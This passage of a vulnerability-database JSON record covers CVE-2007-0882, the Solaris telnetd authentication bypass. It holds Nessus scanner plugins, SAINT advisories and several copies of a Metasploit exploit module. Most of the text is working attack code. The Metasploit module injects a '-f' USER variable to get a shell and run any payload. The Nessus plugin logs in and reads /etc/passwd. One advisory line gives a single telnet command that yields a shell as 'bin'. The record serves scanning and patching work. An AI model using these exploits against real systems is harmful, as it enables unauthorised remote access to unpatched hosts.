"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-12-13T09:20:06", "bulletinFamily": "scanner", "description": "The remote version of telnet does not sanitize the user-supplied\n", "modified": "2019-12-02T00:00:00", "id": "SOLARIS10_TELNET_ENV.NASL", "href": "https://www.tenable.com/plugins/nessus/24323", "published": "2007-02-12T00:00:00", "title": "Solaris 10 Forced Login Telnet Authentication Bypass", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(24323);\n script_version(\"1.32\");\n script_cve_id(\"CVE-2007-0882\");\n script_bugtraq_id(22512);\n\n script_name(english:\"Solaris 10 Forced Login Telnet Authentication Bypass\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to log into the remote system using telnet without\nsupplying any credentials\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of telnet does not sanitize the user-supplied\n'USER' environment variable. By supplying a specially malformed USER\nenvironment variable, an attacker may force the remote telnet server\nto believe that the user has already authenticated. 
\n\nFor instance, the following command :\n\n\ttelnet -l '-fbin' target.example.com \n\nwill result in obtaining a shell with the privileges of the 'bin'\nuser.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install patches 120068-02 (sparc) or 120069-02 (i386),\nwhich are available from Sun.\n\nFilter incoming to this port or disable the telnet service \nand use SSH instead, or use inetadm to mitigate this \nproblem (see the link below).\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.sans.org/pipermail/list/2007-February/025935.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://isc.sans.org/diary.html?storyid=2220\" );\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/02/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/02/10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:24\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\nscript_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_summary(english:\"Attempts to log in as -fbin\");\n 
script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gain a shell remotely\");\n script_dependencie(\"find_service1.nasl\", \"openwrt_blank_telnet_password.nasl\");\n script_exclude_keys(\"openwrt/blank_telnet_password\");\n script_require_ports(\"Services/telnet\", 23);\n exit(0);\n}\n\ninclude(\"data_protection.inc\");\n\nif (get_kb_item(\"openwrt/blank_telnet_password\")) exit(0, \"Ignoring host with an unpassworded OpenWrt Telnet service.\");\n\nOPT_WILL = 0xfb;\nOPT_WONT = 0xfc;\nOPT_DO = 0xfd;\nOPT_DONT = 0xfe;\n\nOPT_SUBOPT = 0xfa;\nOPT_ENDSUBOPT = 0xf0;\n\nOPT_ENV\t\t= 0x27;\n\nport = get_kb_item(\"Services/telnet\");\nif(!port) port = 23;\nif(!get_port_state(port))exit(0);\n\n\nsoc = open_sock_tcp(port);\nif ( ! soc ) exit(0);\n\nsend(socket:soc, data:raw_string(0xff, OPT_WILL, OPT_ENV));\n\ntimeout = 5;\n\nwhile ( TRUE )\n{\n counter ++;\n if ( counter > 200 ) break;\n s = recv(socket:soc, length:1, timeout:timeout);\n timeout = 5;\n if ( strlen(s) == 0 ) break; # End of options ?\n if ( ord(s[0]) != 0xff )\n\t break;\n\n else {\n\t s = recv(socket:soc, length:2);\n\t if ( strlen(s) != 2 ) break;\n \t if ( ord(s[0]) == OPT_DO && ord(s[1]) == OPT_ENV )\n\t {\n\t send(socket:soc, data:raw_string(0xff, OPT_SUBOPT, OPT_ENV) + raw_string(0,0) + 'USER' + raw_string(1) + '-fbin' + raw_string(0xff, OPT_ENDSUBOPT));\n\t }\n\t else if ( ord(s[0]) == OPT_DO && ord(s[1]) != OPT_ENV ) send(socket:soc, data:raw_string(0xff, OPT_WONT) + s[1]);\n \t else if ( ord(s[0]) == OPT_WILL ) send(socket:soc, data:raw_string(0xff, OPT_DONT) + s[1]);\n \t else if ( ord(s[0]) == OPT_SUBOPT )\n\t {\n\t prev = recv(socket:soc, length:1);\n counter2 = 0;\n while ( strlen(prev) && ord(prev[0]) != 0xff && ord(s[0]) != OPT_ENDSUBOPT )\n {\n prev = s;\n # No timeout - the answer is supposed to be cached\n s = recv(socket:soc, length:1, timeout:0);\n if ( ! 
strlen(s) ) exit(0);\n counter2++;\n if ( counter2 >= 100 ) exit(0);\n\t }\n\t }\n \t}\n}\n\nr = recv(socket:soc, length:4096);\nsend(socket:soc, data:'id\\r\\n');\nr = recv(socket:soc, length:4096, min:4096);\nif ( (uid = egrep(pattern:\"uid=\", string:r)) )\n{\n send(socket:soc, data:'cat /etc/passwd\\r\\n');\n passwd = recv(socket:soc, length:65535, min:65535);\n passwd = data_protection::redact_etc_passwd(output:passwd);\n report = 'It was possible to log into the remote host as \\'bin\\' :\\n' + uid + '\\nThe file /etc/passwd contains :\\n\\n' + passwd;\n security_hole(port:port, extra:report);\n} \n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-09-01T23:40:47", "bulletinFamily": "scanner", "description": "SunOS 5.10_x86: in.telnetd patch.\nDate this patch was last updated by Sun : Feb/21/07", "modified": "2018-08-13T00:00:00", "published": "2007-02-14T00:00:00", "id": "SOLARIS10_X86_120069.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24342", "title": "Solaris 10 (x86) : 120069-03", "type": "nessus", "sourceData": "\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(24342);\n script_version(\"1.23\");\n\n script_name(english: \"Solaris 10 (x86) : 120069-03\");\n script_xref(name:\"IAVB\", value:\"2007-B-0006\");\n script_cve_id(\"CVE-2007-0882\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 120069-03\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10_x86: in.telnetd patch.\nDate this patch was last updated by Sun : Feb/21/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/120069-03\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/14\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/02/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/02/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 120069-03\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, 
Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:38:52", "bulletinFamily": "scanner", "description": "SunOS 5.10: in.telnetd patch.\nDate this patch was last updated by Sun : Feb/21/07", "modified": "2018-08-13T00:00:00", "published": "2007-02-14T00:00:00", "id": "SOLARIS10_120068.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24343", "title": "Solaris 10 (sparc) : 120068-03", "type": "nessus", "sourceData": "\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(24343);\n script_version(\"1.26\");\n\n script_name(english: \"Solaris 10 (sparc) : 120068-03\");\n script_xref(name:\"IAVB\", value:\"2007-B-0006\");\n script_cve_id(\"CVE-2007-0882\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 120068-03\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10: in.telnetd patch.\nDate this patch was last updated by Sun : Feb/21/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/120068-03\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/14\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/02/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/02/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 120068-03\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, 
Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "description": "Added: 02/16/2007 \nCVE: [CVE-2007-0882](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882>) \nBID: [22512](<http://www.securityfocus.com/bid/22512>) \nOSVDB: [31881](<http://www.osvdb.org/31881>) \n\n\n### Background\n\nThe [Telnet](<http://en.wikipedia.org/wiki/Telnet>) service allows remote users to authenticate to a system and use an interactive command shell. The Telnet service is implemented by the Telnet daemon, `**telnetd**`. \n\n### Problem\n\nThe `**telnetd**` program in Solaris 10 and 11 misinterprets `**USER**` environment variables beginning with \"-f\", resulting in an authentication bypass vulnerability. A remote attacker could execute arbitrary commands using a standard telnet client program. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Alert 102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n\n### References\n\n<http://secunia.com/advisories/24120> \n<http://www.kb.cert.org/vuls/id/881872> \n\n\n### Limitations\n\nExploit works on Solaris 10 and 11. Root access can only be gained if the target system allows non-console superuser access. 
\n\n### Platforms\n\nSunOS \n \n\n", "modified": "2007-02-16T00:00:00", "published": "2007-02-16T00:00:00", "id": "SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/solaris_telnetd_auth", "title": "Solaris telnetd authentication bypass", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:57", "bulletinFamily": "exploit", "description": "Added: 02/16/2007 \nCVE: [CVE-2007-0882](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882>) \nBID: [22512](<http://www.securityfocus.com/bid/22512>) \nOSVDB: [31881](<http://www.osvdb.org/31881>) \n\n\n### Background\n\nThe [Telnet](<http://en.wikipedia.org/wiki/Telnet>) service allows remote users to authenticate to a system and use an interactive command shell. The Telnet service is implemented by the Telnet daemon, `**telnetd**`. \n\n### Problem\n\nThe `**telnetd**` program in Solaris 10 and 11 misinterprets `**USER**` environment variables beginning with \"-f\", resulting in an authentication bypass vulnerability. A remote attacker could execute arbitrary commands using a standard telnet client program. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Alert 102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n\n### References\n\n<http://secunia.com/advisories/24120> \n<http://www.kb.cert.org/vuls/id/881872> \n\n\n### Limitations\n\nExploit works on Solaris 10 and 11. Root access can only be gained if the target system allows non-console superuser access. 
\n\n### Platforms\n\nSunOS \n \n\n", "modified": "2007-02-16T00:00:00", "published": "2007-02-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/solaris_telnetd_auth", "id": "SAINT:DA3D62A8F297274BAB795DE91F7D7F28", "type": "saint", "title": "Solaris telnetd authentication bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "description": "Added: 02/16/2007 \nCVE: [CVE-2007-0882](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882>) \nBID: [22512](<http://www.securityfocus.com/bid/22512>) \nOSVDB: [31881](<http://www.osvdb.org/31881>) \n\n\n### Background\n\nThe [Telnet](<http://en.wikipedia.org/wiki/Telnet>) service allows remote users to authenticate to a system and use an interactive command shell. The Telnet service is implemented by the Telnet daemon, `**telnetd**`. \n\n### Problem\n\nThe `**telnetd**` program in Solaris 10 and 11 misinterprets `**USER**` environment variables beginning with \"-f\", resulting in an authentication bypass vulnerability. A remote attacker could execute arbitrary commands using a standard telnet client program. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Alert 102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n\n### References\n\n<http://secunia.com/advisories/24120> \n<http://www.kb.cert.org/vuls/id/881872> \n\n\n### Limitations\n\nExploit works on Solaris 10 and 11. Root access can only be gained if the target system allows non-console superuser access. 
\n\n### Platforms\n\nSunOS \n \n\n", "modified": "2007-02-16T00:00:00", "published": "2007-02-16T00:00:00", "id": "SAINT:F83AF66562E2301032ED9A730B8E80E0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/solaris_telnetd_auth", "type": "saint", "title": "Solaris telnetd authentication bypass", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:43", "bulletinFamily": "exploit", "description": "", "modified": "2009-10-28T00:00:00", "published": "2009-10-28T00:00:00", "href": "https://packetstormsecurity.com/files/82328/Sun-Solaris-Telnet-Remote-Authentication-Bypass.html", "id": "PACKETSTORM:82328", "type": "packetstorm", "title": "Sun Solaris Telnet Remote Authentication Bypass", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability', \n'Description' => %q{ \nThis module exploits the argument injection vulnerabilty \nin the telnet daemon (in.telnetd) of Solaris 10 and 11. 
\n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-0882' ], \n[ 'OSVDB', '31881'], \n[ 'BID', '22512' ], \n], \n'Privileged' => false, \n'Platform' => ['unix', 'solaris'], \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'Space' => 2000, \n'BadChars' => '', \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl telnet', \n} \n}, \n'Targets' => \n[ \n['Automatic', { }], \n], \n'DisclosureDate' => 'Feb 12 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(23), \nOptString.new('USER', [ true, \"The username to use\", \"bin\" ]), \n], self.class) \nend \n \ndef exploit \nconnect \n \nprint_status('Setting USER environment variable...') \n \nreq = \"\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB\" \nreq << \"\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF\" \nreq << \"\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05\" \n \nsock.put(req) \nsock.get_once \n \nreq << \"\\xFF\\xFC\\x25\" \n \nsock.put(req) \nsock.get_once \n \nreq << \"\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0\" \n \nsock.put(req) \nsock.get_once \n \nreq << \"\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0\" \n \nsock.put(req) \nsock.get_once \n \nreq << \"\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24\" \n \nsock.put(req) \nsock.get_once \n \nreq = \"\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF\" \nreq << \"\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52\" \nreq << \"\\x01\\x2D\\x66\" + datastore['USER'] + \"\\xFF\\xF0\" \n \nsock.put(req) \nsock.get_once \nsleep(0.25) \n \nsock.put(payload.encoded + \"\\n\") \nsleep(0.25) \n \nhandler \nend \n \nend \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82328/fuser.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T23:37:04", "bulletinFamily": "exploit", "description": "Sun Solaris Telnet 
Remote Authentication Bypass Vulnerability. CVE-2007-0882. Remote exploit for solaris platform", "modified": "2010-06-22T00:00:00", "published": "2010-06-22T00:00:00", "id": "EDB-ID:16328", "href": "https://www.exploit-db.com/exploits/16328/", "type": "exploitdb", "title": "Sun Solaris Telnet Remote Authentication Bypass Vulnerability", "sourceData": "##\r\n# $Id: fuser.rb 9583 2010-06-22 19:11:05Z todb $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits the argument injection vulnerabilty\r\n\t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9583 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0882' ],\r\n\t\t\t\t\t[ 'OSVDB', '31881'],\r\n\t\t\t\t\t[ 'BID', '22512' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 12 2007',\r\n\t\t\t'DefaultTarget' 
=> 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(23),\r\n\t\t\t\t\tOptString.new('USER', [ true, \"The username to use\", \"bin\" ]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tprint_status('Setting USER environment variable...')\r\n\r\n\t\treq = \"\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB\"\r\n\t\treq << \"\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF\"\r\n\t\treq << \"\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFC\\x25\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq = \"\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF\"\r\n\t\treq << \"\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52\"\r\n\t\treq << \"\\x01\\x2D\\x66\" + datastore['USER'] + \"\\xFF\\xF0\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\tselect(nil,nil,nil,0.25)\r\n\r\n\t\tsock.put(\"nohup \" + payload.encoded + \" >/dev/null 2>&1\\n\")\r\n\r\n\t\tselect(nil,nil,nil,0.25)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16328/"}, {"lastseen": "2016-02-01T11:31:41", "bulletinFamily": "exploit", "description": "Solaris 10, 11 Telnet Remote Authentication Bypass. CVE-2007-0882. 
Remote exploit for solaris platform", "modified": "2007-02-12T00:00:00", "published": "2007-02-12T00:00:00", "id": "EDB-ID:9918", "href": "https://www.exploit-db.com/exploits/9918/", "type": "exploitdb", "title": "Solaris 10 / 11 Telnet - Remote Authentication Bypass", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits the argument injection vulnerabilty\r\n\t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0882' ],\r\n\t\t\t\t\t[ 'OSVDB', '31881'],\r\n\t\t\t\t\t[ 'BID', '22512' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 12 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(23),\r\n\t\t\t\t\tOptString.new('USER', [ true, \"The username 
to use\", \"bin\" ]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\t\t\t\r\n\t\tprint_status('Setting USER environment variable...')\r\n\t\t\r\n\t\treq = \"\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB\"\r\n\t\treq << \"\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF\"\r\n\t\treq << \"\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05\" \r\n\t\t\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\treq << \"\\xFF\\xFC\\x25\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\treq << \"\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0\"\t\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0\"\t\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq = \"\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF\"\r\n\t\treq << \"\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52\"\r\n\t\treq << \"\\x01\\x2D\\x66\" + datastore['USER'] + \"\\xFF\\xF0\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\t\r\n\t\tsleep(0.25)\r\n\r\n\t\tsock.put(payload.encoded + \"\\n\")\r\n\t\tsleep(0.25)\t\r\n\t\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9918/"}, {"lastseen": "2016-01-31T18:08:54", "bulletinFamily": "exploit", "description": "SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit. CVE-2007-0882. 
